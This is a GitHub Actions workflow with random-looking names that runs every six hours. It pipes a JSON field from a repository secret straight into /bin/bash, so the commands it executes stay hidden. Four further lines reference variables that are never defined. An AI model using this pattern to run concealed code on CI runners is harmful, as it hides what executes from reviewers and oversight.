name: xingtianyuan4567
on:
  workflow_dispatch:
  schedule:
    - cron: '19 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xingtianyuan4567
        env:
          moqby98: ${{ secrets.moqby98 }}
        run: |
          echo $moqby98 | jq -r .biz9 | /bin/bash
          echo $qnldr08 | jq -r .gumr29 | /bin/bash
          echo $n21457 | jq -r .xjgoe31 | /bin/bash
          echo $l49 | jq -r .rsvwp2 | /bin/bash
          echo $d36 | jq -r .ny2 | /bin/bash

